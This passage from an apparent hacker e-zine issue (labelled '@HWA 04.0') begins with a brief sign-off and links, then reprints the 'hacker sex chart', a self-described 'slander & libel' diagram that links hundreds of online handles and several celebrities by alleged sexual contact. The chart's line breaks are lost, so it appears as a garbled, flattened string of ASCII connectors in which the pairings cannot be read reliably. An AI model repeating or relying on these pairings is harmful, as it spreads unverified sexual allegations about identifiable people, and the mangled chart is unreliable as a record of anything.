man whitecee, keep Youre head up. Peace to everyone who gave support via email or IRC. I wish You a happy and a bug-free New Year. Links... - Attrition.org: Keep up the good work fellows - HelpNet Security: The best news site on the net - Black Lava Network: BLN for life !!! Copyright © slash Penetrating systems since 1998 @HWA 04.0 The hacker sex chart 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~ This was to be included in the last issue but attrition was down (only source I know of that carries it) so here it is in its glory. *********** WARNING: Explicit content ************************************** slander & libel -- the official computer scene sexchart "that's none of your business!" version 9.04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - for updates, additions, or to be put on the sexchart mailing list, mail crank@ice.net. to receive the latest version on efnet irc, "/msg lifelike sexchart". a link is denoted by any sexual action between computer users that is capable of spreading an std, from wet kissing on up. the last .05 of revisions is listed at the bottom. since the chart has grown so much, it's been extended in a strange way. to preserve the 78 column width, there is now a secondary chart beneath the first. people whose names appear between asterisks (*) in the first chart also exist in the second. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .--------- turin -------------------------------------. | .----' | ||`---------------------------. | toby | | |`----- keeper | | .-|------|-|--------|---|-- intro -------|---------|------------. | | .----|-|----- bjoe | | | | | .-----|-|-|----|-|------------|-- brat acidqueene | | | .---|-|-|----|-|------------|----|-----------|------|--|-----. | | | | | | | `--. | | shorty | | | | | angst | | | .--|-- reality ---|----|--|------ weedboy | | | | || |`--|-|-|-|--|--------------|----|--|--------|------|--|-----|----. | || `---|-|-|-' | | | | .------' | | | | | || .---|-|-|----|-- morgaine | | | | DJTrax | | | | | || | | | |.---|------|-------|-- lucky | | | llama | | | || | | | || | .-- thal ----' .----|-|--' potter | | | | | |`-|-- oodles --|-|------------ styx --|-|--------|----|-|---. | | | | | | | | | cerkit | | | | scat | | | | | | | | .-' | vera | | .-|--|---|-|-----------|-|-|---|--|----|-|--. | | | b3 | .' | skatin | | `--.| | dukeo | | | | | | | | | | | `-----|-|--.`. | .---|-' || |.-' | | | blueeyes | | | |.-|-|---------|-|--|-|-|-|---|----- evol! --- eerie | | | || | | | | || |.' | | | | | | ffej .--'|| || .-----|-' | | || dom | | | || || | | | | | | | | | .-'| |`--.| .-|---|-|--'| | | | | || || morph | | metalchic | | | | | || | | | |.--' carly | | | || || `----|-|---' | |`--|-|-|--|-|-- bF --' | 8ball ----'| | | | || || spacehog `.`. scuzz | | | | | `----|-----|---|-|---. xan | | | || |`-. `----|-|--. | `-|-|--|--. | | | | | | | | || | TH0M Y0RKE | | kurdt -|-----|-' | | `-----|-. | | beck | | | |`.`. | `-. | `-----|---.| crimson | | | `---|----. | | | `-|-|- collette `-. | `-- claud -|--.||.--' | | | nymph | | | | .-|-|-------|-----|-|---------|--|- pip!@ --. | | | | | | | | |.' | kablooie | | gumby | |.-'| || cancer | `-|----|---- beastie | ||.-' | | | | | | || | |`-. | | sample --' | | ||| mooer --' | | ladydeath | || | | iamjustme | | | | ||| || | | | | .--|----|--'| | | | | inuendo | | ||| || cardamon | | | | nitz | | | fatslayer .-|---' | | | ||| |`----------|-|-|-|-------|---|--|-----------|-' leesa hgirl | | ||| | tsoul .--' | | | sensei | littlestar | | | | | | ||| | | | | | | .------' | fried dcheese ----' | ||| | demon | aoxomoxoa --|-- poppie .----------' | | | ||| | | `----. | `-. | | | alecks abacab | wishchld | ||| `-- ostrich --|-|-. | | donnie | |.-------' | | ||`---------|-----|-|-|-|--|----' | || atropos assamite | dka | || jellyb | | | | | .---|-.|| |.--------' | | | |`. | | | | | gilmore | baital .-- novicane .--' katester | | | michelle_ .---|-|-|-|--|----|-----|--'| | | | .---' | | | | | | | | | | crayon | pol | | TOXiC79 | | _evol_ | | | abraxas | | | | | | .----|-|-|----------' | | | | | | | | | | | vritra --|-|---.| | |.- bonita80 | shroomy69 | | | mercuri | | | | | `---------.|.' || | ||.----------' | | | | | | `---|-|-|-|-- nerkles |||.-- GoNINzo! ------ september | | | | | lori | | | `-----------.|||| | ||`----------|------|-' | | | | | | | | mona ||||| dazey |`----- ambigu0us --|---' | | | skooter nic | | | | ||||| | | | | vocks | | | | | | | | grimwater -.||||| NightMyst | | | | | sita -- ninja | | | |||||| | marcus666 | | | .---'| `-.| | | path0s --.||||||.-- turbo -- ivy256 | | | | jules ziggy || | | |||||||| | dannyman | | | || || | | photochic ||||||||.-- holden -- syn | | | | | krampus --'| || | | | ||||||||| | christy | | | | || | | spirit --.||||||||| lucifuge yumas | | | | | indpuck --' || | | | ||||||||||.-' | .'.-- kkrazy | | | .--'| | `----|---- crank!@#@%! ------ jamesy --|-|-------. | | | all-of-nitco | `-----.| | | || | bex | | | .- LCN | | `-. | `-----. || | | |`-|-----|--------|---|-|---|---.| | `-. | fishhead hawk | |`-. | | | | .---|--------|---' | | || | | | | | | | | | | `--|-|-- puck --- kinessa --|--.|| | | | tamago | darwin | | | | | | | .--' | ||| | .-|-|-----|---|----|----|-|--|---|---|----|-' | .-----------------' ||| | | | | art | | `-- kaia -|---|---|---.| | | graywolf jakey ||| | | | | | |.--|--------' `-. | | | || `--|-------.| .---' ||| | | | | seaya `---- fawn --|-|---|---|-- mogel --|------ pixy -------.||| | | | | | .---|---|-|---|---|----' || `-----. | |`------. |||| | | | | slug grlfrmars `-. | | | `----. |`-------. | | `------.| |||| | | | | | | | | | | `------. | nykia | | | turtle || |||| | | | | kev-man | wildcard | `-|---------.| `--. | | | | || |||| | | | `---------|----------|---|--------.|| hateball | | | jook || |||| | | `. spectacle `---|-------.||| .-----|-|-' | | || |||| | |.-|-------------------------|------ murmur -|-----|-|---' | ogre || |||| | || | | || ||`--|-----|-|-----|--|-. || |||| | || | .-----------|-------'| |`---|----.| | peggy | || |||| | || | Guitarzan --|-. CapnRat | | | | || | | | || |||| | || | .--|-|---|-----|- keroppi | .--|-- page! -- ghort | || |||| | || | crash313 | | | bond `--. | | | | .'| | | | | || |||| | || |.---|-----|--|-|----|-------|-|-----|-|--|--|-|--|----' | | || |||| | || || windx --|--|-' | .----|-'.----' | | | | | | | || |||| | || ||.-'|.----'.-|------|--|----|--|------' | | |.-|------' | || |||| | || ||| || | | | |.---|--|--. | | || | dedboy | || |||| | || ||| || .---' | hitchcock --|--|--|------|--' || | | | | || |||| | || ||| || | | | | | | | | .' larissa | .'| | | glynis || |||| | || ||| || | .--|--|-|-|-|-|---|-|--. | | | | | || |||| | || ||| || | | | | | | | | | | AnonGirl | | | | | Juliette || |||| | || ||| || | | | | | | | | | | | | .-|-|-|-' | || |||| | || ||| swisspope | | | | | | | | Medusa --|-|-|-|-|---- PrimeX || |||| | || |||.-' ||`--|--|-|-|-|-|---|-|----------|-|-|-|-|------------'| |||| | || |||| || | | | | | | | | cinnabon | | | | | Fiyaball | |||| | || |||| |`---|--|-|-|-|-|---|-|--|-----. `-|-|-|-|----------|-.| |||| | || ||||.--- piglet -' | | | `---|-|--|-----|-. | | | | | || |||| | || ||||| `----|-|-|-----|-|--|-----|-|-|-|-' | | || |||| | || ||||| pie -- bor | | | .---' | | .-|-|-|-|---|-- Quarex | || |||| | || ||||| | | | | | .---' | | | | | |.--' | | || |||| | || ||||| lankan --|-|-|-|-|- sweeney | | | | || RaggedyAnne | || |||| | || ||||`----. | | | | | | | | | | || | | | || |||| | || |||`---. | | | | | | toasty --' | | | || | `-.| || |||| | || ||`----|-|- PoGo .-' | `-|-|------. | | | || PointBlank || || |||| | || waar | | | |.--|---' `----. | | | | |`-. | || || |||| | || || | | | | || | .----|-|-----|-|-|-|--|--- hylonome || |||| | || || | .-|-|- hillary -|-----|----|-|-----|-|-|-|--|------------.|| |||| | || || | | | | | | |`--|- ideaman | | | | | | | dr0ne ||| |||| | || || `-|-|-|---|-|-|---|----------|-|-----|-|-|-|- ryu ---.| ||| |||| | || || .-|-|-|---' | `---|-- Fowlez | | | | | | .'| carrie ||| |||| | || || | | | `-----|-----|--. | | | | | | | | | ||| |||| | || |`-|-|-|-- severino | RottenZ -|-|-----|-|-|-' | | nuprinboy ||| |||| | || | | | | | | | | || | | | | | | | | ||| |||| | || | .' | | laurak -----' | | |`--|-|---- narya --' | redfox ||| |||| | || | | | | | `--------' | `--.| | | | ||| |||| | || | | `-|-|-- Dravanavin poto || | djbump feival --. ||| |||| | || | | `-|--------------------.|| |.--' | ||| |||| | || | | kyst | renen -------- jamming roller ||| |||| | || | `---|--|---- fritz clinto | seth -------------------'|| |||| | || `--- SiN13 --------|---|--------' | | .------------------'| |||| | |`--. `--------- tracy -------------' | | trep |||| | | .-|--------------------------------------|---' $t.andrew | |||| | | | | GWEN STEPHANI SARA GILBERT candyrain | | tart |||| | | | | | | | fatima --' | |||| | | | | BILLY C0RGAN GAVIN R0SSDALE DREW BARRYM0RE | |.--------' |||| | | | | `---. | | | ||.---------'||| | | | | ED N0RT0N -- C0URTNEY L0VE -----' mysl minstrelle |||.---------'|| | | | | .----' | | | `-----.||||.---------'| | | | | KURT C0BAIN TRENT REZN0R -- tammy `----|------.||||||.---------' | | | | | | |`-------|--- *gweeds@!#* -------. | | | | MARY L0RD T0RI AM0S JELL0 BIAFRA | .---'||| |||`--------.| | | | | | | .--'|| ||`--------.|| | | | |.----- trilobyte --- Schquimpy freqout --|-|-|---'| |`--------.||| | | | || | | | | | | | .' WL |||| | | | || chinagirl amos -- EddieV `-- Nex | | | | | |||| | | | || .------------|-------' | | | | dave_rast |||| | | | sonia ------- velcro agentorange moonlyte | | | | |||| | | | | | |`----. `----. | | | | | | lemson |||| | | | | | sate plexus | savvy neko --' | | | | | |||| | | | | | | | | .-'| | .-|-|-|-- whoops |||| | | | | gage `-- rabidchild kirshana | Katia | | | | || |||| | | | | | | | | | | | jess |`-- nyar |||| | | | argent fate beaker | gnarf Sylvie | | | | | | |||| | | | .-----------|---|-----|------------------' | | andrew | skora |||| | | | | fuaim sedrick | | | | |||| | | | | anathema .----------------------|-|----|---' |||| | `-|--|-|-----------------|-. .------------------' | mswicked |||| | | | | nadyalec erise | | | .--------- duatra -' .-------------'||| | .-|--' | | .--' | | | | | timbrel | | ||| | | | riotboi tao puff | | | | | | |.-- nineve | random-tox ||| | | | `-----. | | | | | | .-- corp! ----------' | .----'|| | | `- tanadept XunilOS | | | | | | | |||| silicosis -- espidre ---.|| | | | ||`-----. | | | | | | | | |||| | ||| | | siren |`---. skywind | | | | | | |||| mudge -- shewolf -- iskra ||| | | | `-. | | | | | | | |||| | ||| | | kingtrent | cbnoonan --|-|-|-|-|-|---'||| r2 -- mujahadin level6 ||| | | `------. | | | | | | | .'|| `---. `-.||| | | lilindian | lex | | | | | | | || ssq teq -- vYrus | sp0t |||| | | | | | | | | | | | | || `-------------.| | | |||| | | Goddess4u | lorah | | | | | | | |`. anarchist --. || | |.--'||| | | | | | | | | | | | | | | | || | || ||| | | .------ DrkSphere | | | | | | | | | | tymat -- *pinguino!##@#* ||| | | | | || |`----|-|-|-|-|-|-|---|-|-|---|-------'|||||||||||| ||| | | | CrazyLuna || | `.| | | | | | | | | gemmi |||||||||||| ||| | | | .-'| meelah || | | | | | | | | |||||||||||| ||| | | Sweetgal_ | | || | | | | | | | | barkode --'||||||||||| ||| | | | Wi|dChild || | | | | | | | | ||||||||||| ||| | | angeleyes .'| | | | | | | | | is0crazy ---'|||||||||| ||| | | .--|-|-|-|-|-|-|---|-|-|--------------'||||||||| ||| | | gersh | | | | | | | | | | r_avenger --'|||||||| ||| | | aquis -----------|-|-|-|-|-|-|---|-|-|----------------'||||||| ||| | | monkeygrl | | | | | | | | | | ter0daktyl --'|||||| ||| | | skully ------|-------|-|-|-|-|-|-|---|-|-|------------------'||||| ||| | | logicbox ----|-|-|-|-|-|-|---|-|-|-------------------'|||| ||| | | | | | | | | | | | | *apok0lyps* ------'||| ||| | | .------------------|-|-|-|-|-|-|---|-|-|-------|-------------'|| ||| | |.--|-----------. .----|-|-|-' | | | | | | *kamira* .---'|.-'|| | || | | | | | | | | | | | | | || || | ||.-|--------- sarlo --|-|-|---|-' | | | | ao -. quisling tsk .-'| .'| | ||| p3nny |||`---|-|-|---|--.| | | | | | .-------|---|--|-|-|-' ||| | ||| | | | | niala | | | wintarose | .-' | | | ||| sari ||`----|-|-|-. | | | | | | | | | || | | .--' | | ||| | YYZ || | | | | | | laz | | | sinner | | |`. | | | kara | ||| *rage* | |`-----|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|----' | ||| | astraea ---|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|------' ||| rio | | | | | | `-|-----|-|-|--------|-|-|-|--|-|-|--------. ||| | | phz .-|-' `-|---|---. | | | .------|-|-|-|--' `-|-------.| ||| capone |.----|-|-----|---' | | | | | corwin | | `------|---. || ||| asriel --|-|-----|-------|-|-|-|-|--------' valgamon | | || ||| b0gus -----.| | | | timb0 | | | | | `--|---|--.|| ||| .---- gita | | `. | | | | | | | | ||| ||| drd00m | | | | minjo | | | | phone blueadept | | ||| ||| veggie --|-|------|---|----|-|-|-|------|--|---------' | ||| ||| | | | | | | | | .-- tele -- rambone `-.||| ||| .--- pickaxe --|-. | | | | | mrg | |||| ||`------------|----|-----|---|-|-|----|-|-|-|------' |||| || | |.----|---|-|-|----|-|-|-|-- xney3 --- fable -----.|||| || | ||.---|---|-|-|----|-|-|-' | ||||| || RoadRuner | |||.--|---|-|-|----|-|-|-- CosmicMJ schmoopie ||||| || `--|---.|||| | | | | | | | | | | ||||| || hayley | ||||| | | | | | | | arian vek -- sweeties | ||||| || | | ||||| | | | | | | | | | | ||||| || collision --|--.||||| | | | | | | | dj tamtam --- jonathan ||||| || | |||||| | | | | | | | | | ||||| || thoth | |||||| | | | | | | | discogurl -- candacep ||||| || | | ||||||.-|---|-|-|----|-|-|------------------------. ||||| || dpk arkuat | sQurl!#% | .-|-|-' | | | dwildstar phisher | ||||| || | | | | ||||| | | | | | | | | | | ||||| || _Melody_ --|-' ||||| | | | | | | | elek jimmie ----- boufa ||||| || | | | ||||| | | | | | | | | | | `.||||| || atticus | | ||||| | | | | .--|-|-|- comstud MSofty --' | |||||| || | `--. ||||| | | | | lump | | | `--. Kanan |||||| || flashman --|-'|||| | | | | | | | | LarZ -- Tay ------' | |||||| || | .---|--'||| | | | | prae | | | | | | |||||| |`. rezznor | .'|`-|-|-|-|------|-|-|-- Jon2 -' | | |||||| | | | | | | | | | | | | | | | |||||| | | marcus ---|--|-' | | | | | | | | TAYL0R HAWKINS | |||||| | | `-----|--|----|-|-|-|------|-|-|--. | | | |||||| | | | | | | | | | | | | | MINNIE DRIVER | |||||| `-|-. | | | | | | | | | persis ---------------' |||||| | | .---|--' | | | | | | | | `----- violator ---'||||| |.' | supox --|-|-|-|-. | | | morkeleb ----------------'|||| || spruance | `--. | | | `-|----|-|-|----------------------. |||| |`-|--|-----|---------|-|-|-|--.|.---|-|-|---------------------.| |||| .-|--' daria | zymotic | `.`-|- ark --|-|-|-- juniper --. || |||| | | |.-----' | .' | | ||| | | | | | || |||| | | cvk ----- cybele | .-|--|--'|`---|-|-|----|--. ivylotus || |||| | | |`----. | | | | ceili | | | Zem | || |||| | | hellenga | Lone-Wolf | `--|---. | | | | stillson || |||| | | | | | | | |`-|----|---|----|-|-|-. `----. | || |||| | | | regs | | miffy `--|----|- eris5 | | | | dudeman | | || |||| | | | | | `-. | `--. | | | | | | | | `-- sumogirl || |||| | | | | | | scottie | | | | | | | | `----. | | || |||| `-|-|---|--|---|------------|-|--|-|-|-|-|-|-----.| Aleph | eighmi |||| | | .-|--|---|- Wizzbane -|-|--' | | | | | || | | | | |||| .-|-|-|-|--|---|------------|-|----' | | | | Kaleid ----|--|---.| |||| | | | | `--|-. `--------. .-' | BLong | | | ||| |`--. | | bohr |||| | | | | | ChromeLi --|-|---|--------|-|-|-----'|| | halfman | |||| | | | | `------------|-|---|--. .--|-|-|------'| | | | |||| | | | | flatlandr ---- aynn --|--|--|--|-|-|-------|-|---' Mythrandr |||| | | `-|----------------.| | | O_Kei | | | | | |||| | | micki -- rdrunner || lb | | | | | magneto God |||| | | | || | iguana | | | Cones | | | |||| | | | rhendrix -- dbt ---|----|---|-|-|-----|-' hope Tatyana | |||| | | | | |.----|- pete0 | | | `-. |.----' | |||| | | | konkers time ---|--------|-|-|----- Rasputin ---- nympho |||| | | | .------------' `------. | | | | | | |||| `-|- hagbard MandaPanda -- Doobie | | | | LadyViper | VampKitty |||| .-' || | `--|-|-|-|--' | .-------------'||| | m0kab3chu QueenBrocco ---'| ZobZ | | | | Iphigenia | ||| | `-----------..-------|------|-|-|-|-------------|--------------'|| | chickhabit ---.|| Persephone | | | `-----------. | || |.-----------------.||| `---|-|-|-- Stu | | afsaneh || || AK47 --.|||| | | | | | | || || .------------.||||| kubiak | | | .---------- sync gauss || || | bfgrrl -- *meenk!@* ---' | | | | |.---' || || | .----------'| | |`----. vlaad | | | | discodan --.|| aloke || || | | nevre | fl00d | | | | | | ||| | || || | | kaos .-----' teletype | | | | professor ||| | lgas ----.|| ||.-|-|----|--|-------------|--|-----|-|-|-|---|-----.| ||| | | ||| |||.' | amity bumble --' AIDS .-|-|-|-|---|---- xgirl!@$ -|- deker ||| |||| | | | | | | | | | | .-'||| ||| | | | ||| |||| | style wmmr --|-- caitlin | | | | | | gwar ||| ||`-.| | `--.||| |||| | | | | | | | | | | ||| || emilia |||| |||| | coffeegrl .--|- The_Sock | | | | | | cg --'|| || | | | |||| ||||.-' | | .-'| | | | | | | | || || | | boto |||| ||||| nico Alucard | | | kitn | | | | | | dk ---'| || | | |||| ||||| | | | | | | | | | | | | | || | spig |||| ||||| anjee -- meethos | | | | | | | | | .-' swallow || | |||| ||||| | | | | `-|-|-|-|-|-|--. || `-- moose |||| ||||| METchiCK -|-' ^mindy^ | | | | | | ILUVJeNNA || |||| ||||| | ||||| | | | | | | | || |||| ||||| MrJuGGaLo ||||`--|- facedown | | | | | | || |||| ||||| |||`---|-----------|-|-|-|-|-|-- grimmy || |||| ||||| ||`----|-----------|-|-|-|-|-|-. || |||| ||||| phdave |`-----|- f_fisher | | | | | | deadapril || |||| ||||| | `------|-----------|-|-|-|-|-|-. || |||| ||||| Suzzeee dwymer -|-- Bruin | | | | | | supervixn || |||| ||||| `-------.| `--------. | | | | | | || |||| ||||| abbeycat --.|| NeuralizR | | | | | | | || |||| ||||| ||| | | | | | | | | || |||| ||||| lissa ||| Jen1 Briana | | | | | | || |||| ||||| `---.||| | .--'| | | | | | | | || |||| ||||| nyssa --- Wayhigh!@ | | | | | | | | || |||| ||||| .---' | ||| | | | | | | | | || |||| ||||| icy_girl | ||`---|-|---|-|-|-|-|-|-- allira |`---- adamw |||| ||||| | || | | | | | | | | .-' | || |||| ||||| etrigan meta4 |`----|-|---|-|-|-|-|-|-.| ryshask `--- loki |`.|||| ||||| | | .-' | | | | |.' | ||.-' | | | ||||| ||||| *am0eba* Suger | | | | | ||.-' ||| aries99 jazzy | | ||||| ||||| | | | | | | | ||| ||| | | | ||||| ||||| SWinder nettwerk | | | | ||| *tigerbeck* -- spacegirl ||||| ||||| | .---|---' | | | ||| | | | | | | | ||||| ||||| zeven tsal | romulen | | ||`-. | | | twichykat | | | ||||| ||||| | .----------'| | |.------|-' |`. | | | | | | | | ||||| ||||`--. `-|-- devious | | || `-. | | | | | soulvamp | | | ||||| |||`-. | | `-- phyzzix! -------|-|-|-' | | | | | ||||| |||.-|-|---|-- roman --'|| ||| | | | | timmerca | | | .'|||| ||||.' | | | || ||| | | | `--. route | | | |||| ||||| | | emmanuel --'| ||| | | | .----|----------|---|-|-|-'||| ||||| | | | .-----' ||`--------|-|-|-|-. martyn ginny | | | ||| ||||| | | philipw |`--. | | | | | .--------------|-|-|--'|| ||||| | | | homeysan | | | | `--|-- BernieS | | | || ||||| | | J0SH LAZIE | | .--|-|-|-|-. | .---------' | | || ||||| `---|----|--------. | caffiend `.| | | | | | u4ea | || ||||| | | riley | | || | | | | | krnl ---. | | || ||||| .--- wikked | | | lordjello || | | | | | .-- missx || ||||| | .--'||| | | | | | |`.| | | | | | | `. || ||||| | | ||| Weasel | | | demented1 | || | | | | readwerd kc | || ||||`-|-|-. ||| | .-|-|--|--' | | ||.' `--|----|-----------|--|-.|| |||| | | | ||`--. | | neal | hannah .--' ||| aliced | elizabeth | ||| |||| | | | |`-. | | | | | `--. .--|---.||| | | | | | | ||| |||| | | | | | | | | | | .---|--|--|--.||||.--' | | `-. deadlord | ||| |||| | | | | | | | | | | | `--|--|- ophie! ---|--|-. | | | | ||| ||||.-|-|-|-|--|-|-|-|-|-|-|-- erikb | || | | .--' | | | | genders | ||| ||||| | | | | | | | | | | | | | .'| | | | | | | | | ||| ||||| | | | | | | | | | | joe630 | | | | | | | | | | `-- eppie | ||| ||||| | | |.' | | `-|-|-|--|----.| | | | | | | .---|-|-|-----|---|--' ||| ||||| | | || .-|-|---|-' `--|-. || | | | | | | | | | | primal bix ||| ||||| | | || | | | tiffie --' | || | | | | | | | | | | ||| ||||| | | || | | | | | || | | | | | | | | | | jasonf ||| ||||| | | |`-|-|-|- X n0rmag3ne |`. | | | | | | | | | | | ||| ||||| | | | .' | | | | | | | | | | | | | | | | .--- judy ||| ||||| | | | | | `. | otopico `-|-|-|-|-|-|-|-|-|-- y-windows --------.||| ||||| | | | |.-|--|-' | | | | | | | | | | | | | |||| ||||| | | | || | | angelbaby --|-|-|-|-|-|-|-|-|---' | | |||| ||||| | | | || | | .----|-' | | | | | | | Moxie | | ThreeDays |||| ||||| | | | || | Jazzy1 dana --|-. | | | | | | | `--|-|-|--. | |||| ||||| | | | || | | | .---|-|-|-|-|-|-|-|-|-------|-|-' Slinky |||| ||||| | | | || `. | strat | .-|-|-|-|-|-|-|-|-' .----|-|---. | |||| ||||| | | | |`. | | | | | | | | | | | | Xavi .--|-|- BabyHuey |||| ||||| `-|-|-|-|-|-|--------. | | | | | | | | | | | || | | | | |||| ||||| `-|-|-|-|-|-- Ned -|-|-|-|-|-|-|-|-|-|-|-' || | | | rorrim | |||| |||||.----' | | | | | `-|-|-|-|-|-|-|-|-|-|-. |`-|--|-|----|---|-.|||| ||||||.-----' | | | Magenta | | | | | | | | | | | | | | | | | ||||| |||||||.------' | | | | | | | | | | | | | Taps | | | | | ||||| |||||||| .------' Lotus1 `-|-|-|-|-|-|-|-|-|-|-'||`-|--|-|- LamaKid ||||| |||||||| | | | | | | | | | | | | | || | | | | ||||| |||||||| | sunset | | | | | | | | | | | | || | | | | ||||| |||||||| | | | | | | | | | | | | | | | || | | | | ||||| |||||||| Mark kic | Cluey | | | | | | | | | | || | | | | ||||| |||||||`---.| | | | | | | | | | | | | || |.-' | | ||||| ||||||`---.|| | Logre | | | | | | | | | | || ||.--' | ||||| |||||`-. ||`-------|--. | | | | | | | | | | | || ||| | ||||| ||||| | *angieb* | | | | | | | | | | | | | || ||| SueVeneer | ||||| ||||`-.| | .---' sunni -|-|-|-|-|-|-|-|-|-|--'| |||.--' | ||||| |||`-.|| | | .----|--|--' | | | | | | | | | Khat |||| JulieJul | ||||| ||`. ||`-. | | | twi Opie | | | | | | | | | | .-'||| | | ||||| || | |`. | | .-|-|--------|---' | | | | | | | | | Jai ||`--- Jag --|-'|||| |`-|-|-|-|-|--|-|-|----. rosefairy | | | | | | | | | | |`. ||| | |||| |.-' | | | `--|-|-|---.| | | `-|-|-|-|-|-|-|-' | `-|-|----'|| `-.|||| ||.--|-|-|----|-|-|-- b_!@@ dara | | | | | | | |.--' | .---'| ||||| |||.-' | | .--|-|-|--'|| | | | | | | | | | || .--' | GoodGirl ||||| ||||.--|-|-|--' | | || | winmutt | | | | | | | || | |.----.| ||||| ||||| | | | .-|-|---'| | | | | | | | | || | || || ||||| ||||| | | | | | | | wolverine | | | | | | | || | Yummy Guyver ||||| |||||.-|-|-|--|-|-|----|-----------' | | | | | | || | |||| | ||||| ||||||.' | | | | | | xyg shinex | | | | | | || | Rosie -'||| | ||||| ||||||| | | | | | | | | `-|-|-|-|-|-. || | .-'|| | ||||| ||||||| `-|--|-|-|-- *spyder_bytes* | | | | | | || | Rapunzle || | ||||| |||||||.---|--|-|-|----|---------------' | | | | | || | | || | ||||| ||||||||.--' | `-|--. | CrakrMajk --|-|-|-|-|-'| | | Flame -'| | ||||| ||||||||| | `. | | .------------|-|-|-|-|--|-|-|-|-------|-|-'|||| ||||||||| phatgirl | `-|--. | lemony | | | | | | | | | Atomica | |||| ||||||||| | `--|-|-----|----. | | | | | | | | | | | |||| ||||||||| | | | Wizdom | | | | | | | | m00se | | |||| ||||||||| Twizzle | | | | .-|-|-|-|-|-|--|-|----------|--' |||| ||||||||| .--|------ ReelTime --' `-|-|-|-|-|-|-|--|-|--. Dolemite |||| ||||||||| | | .------'| | | | | | | | | | | | | |||| ||||||||| | | | Lullaby Sambrosia | | | | | | | | | nigel | QueenB |||| ||||||||| | | | | `---------. | | | | | | | | | `-------|-------.|||| ||||||||| | | | | b|iss | | | | | | | | | | | ||||| ||||||||| | | | RobertG .---|--|-|-' | | | | | | | | ||||| |||||||||.-|--|-|-----|-|-|- Mikey!# --|-|-|-|-|-|--|-------. Kyleel ||||| |||||||||| | `-|-----|-|-|--'| |||| | | | | | elektra | | ||||| |||||||||| | | | | | | |||`---|-|-|-|-|-|--|---. | RdKill ||||| |||||||||| | Zemora | Blondie ||`--. | | | | | | z1nk | | | ||||| |||||||||| | | .------|----|----'`-. | | | | | | | | AllyCat -. ||||| |||||||||| | `-|------|-- WanMan --|-|-|-|-|-|-|-|------|---' | | ||||| |||||||||| `---|------|----------. | | | | | | | misuse | .- Pbass | ||||| |||||||||| | Izzy `- Oscer --|-|-|-|-|-|-|-|--------|--|----' | ||||| |||||||||| | | | | | | | | | | | | | | MastElmo ||||| |||||||||| | | Brian-X Macc | | | | | | | | | `--.| | ||||| |||||||||| | | | | | | | | | | | | | `-- *Starr* | ||||| |||||||||| Maia!@% Bellez --|-' | | | | | | *B00bz* -----'| | | ||||| |||||||||| | ||`-------|----|---|-|-|-|-|-|--|-|------- Rig | | ||||| |||||||||| *Chef* |`------ Cidaq | | | | | | | | | .-------|--|-'|||| |||||||||| Breetai | | | | | | | | | | .--' | |||| |||||||||| | `-. | | | | | | | luci | | Female |||| |||||||||| Corn | NuConcept .---|-' | | | | | | | |`-|---.| | `.|||| |||||||||| | | | | `-. | | | | | | | | | *hydro311* ||||| |||||||||`--- lydia_atl PastaGal ---|-|-|-|-|-|--|-|-|--|--|----. .-'|||| ||||||||| | | | `-|-|-|-|-|--|-' `--|--|-- Shad0w |||| ||||||||| Pnutgirl | GonzoLoco DrMonk | | | | | `------|--|--. |||| ||||||||| | | | | | | | | .-------' | SessyJen |||| ||||||||| LilDave -' CompChick Gemni | | | | | | splat ---|--' |||| ||||||||| | .---' | | | | | | | .-' Spastica |||| ||||||||`-- bluesxxgrl .--- DH | KL | | | | | | `---|----' | |||| |||||||| | |.------|--' | | | | | | | CybrChrist |||| |||||||| | redmare ||.- SN | .--' | | | | | `---. |||| |||||||| | | |||.----|--|----|-|-' | phreaky VenusGirl |||| |||||||`--. | tabas --.||||.---|--' .--|-|---' .-------------'||| ||||||`---|-|------------.|||||| | .--|--' | *magpie* | .------'|| |||||| .-|-' r0ach |||||||.--|-|--' | `--.| m0rg1 | yy[z] || |||||| | | | .--- n0elle!@ | | onkeld badger || | | | || |||||| | | albatross .--' | || | | | | | || ajx --|-- mo || |||||| | | jsz | || `.| | littleone `-.|| .----|--. | || |||||`. `-|--. wing -------' |`---.||.--|------------ juliet --.| max-q || ||||`-|-. | | mooks nts |||| `-. gfm --. | || | || |||`. | | | `------------|---|-- *fuz!* --|-------- morgen | looey | || ||`-|-|-|-|-- kitkat^ ----|---|----'||`----|- lesb0 -|--|---|---. | || || | | | | | | || | | | | luq | || |`--|-|-|-|---------------|---|-----'| dangergrl earle | | | || | | | | | sparxx --- l0ra!@ ----' | | | | | scorpion | || | `-|-|-|---------------'|| || slawz | | WIL WHEAT0N | | | || | | | | dt --'| |`----------|--|--------. | sfuze | || | | | | .--' | .---' oghost mchemist --' | || | | `-|--------------|----|-------|---------------' | | || | | `--------------|--- theejoker zens -- skinflower suiciety | || | | rosieriv -- tfish | | | | | | || | | | | `-----. quagmire | monachus -|-|-- daud | || | | | chlamydiarose | | | | | | || | `------|---. | | nekkidamy polymorf `---. | .'.'| | .-- gheap | Zomba_Soul isis --------|---|------------|-|------|-|-' | | | .--- q | | | | | | | | | acronym | | | syndrome | |.-----' `-. | torquie ------|-- countzero | | | | | | || plexor | | | | | *thepublic* | | | || | | `--|----|--------|-- theora -- RAgent | | | | | || | | ludi dispater | | | rainbow lust!@@# --' | `--------|----|-- dildog -- ladyada .--|-----' | | |||| | | phen bopeep | .-|--|--- *maq* -. | |||| netmask -' .---|------' | | montel --. .-------|-|--|-----' | | | |||`-|--------. | el_jefe ---|-|-------- Heather sami | | .-----|---|-' ||| | | | | | | | | | | .---' | ||| | cal | | Mika tari --|-|-- dan_farmer .-- *pill* | | | vamprella ||| | | | | `-. | | | | .----|--|-|-|---|-------'|`. | Er1s | | val -- shipley -- muffy demonika --|--' | | purpcon | | | | | | | || | | | .-'| |||| .-' .-' | .---|-|-|-' JonM | | karrin --'| | danea mycroft | |||`-|--. | .-|-- kel -|---|-|-' | | | | | | | | ||| | lizzie | .-' | | | | JiJi | | CGD -- jen `-|--- banshee | | ||| | | | | | gh0st --|-|------' | `---------------|------------' | ||| | | sage | `--. .--' `-. shaedow Astaroth | wraith --|--'|| `-|------|----|----|-----.| | | | | | | |`----|------|-- *disorder* wednesday | DangerJen .--- se7en t | `-----|------|----|-|-|---------' | | | | `---. | onyx -- furie | | | blaise -- skippy | msk ---' simunye pandora `---|------------|----|-|------------------' ||| michelle ----|----' yt -- panther_modern ||`---------------------------------. .---|---------------. || .--------------------------- 